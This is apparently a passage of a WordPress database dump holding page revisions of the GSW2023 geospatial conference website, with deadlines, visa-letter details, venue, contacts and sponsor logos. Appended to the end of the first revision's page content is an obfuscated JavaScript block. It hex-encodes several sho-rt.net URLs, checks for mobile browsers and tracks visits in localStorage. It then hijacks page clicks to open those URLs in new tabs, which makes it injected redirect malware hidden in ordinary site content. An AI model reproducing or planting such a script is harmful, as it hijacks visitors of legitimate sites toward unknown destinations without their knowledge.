#ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-10 00:34:55','2023-07-10 00:34:55','',3066,'https://gsw2023.com/?p=4980',0,'revision','',0),
(4981,1,'2023-07-10 00:35:47','2023-07-10 00:35:47','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 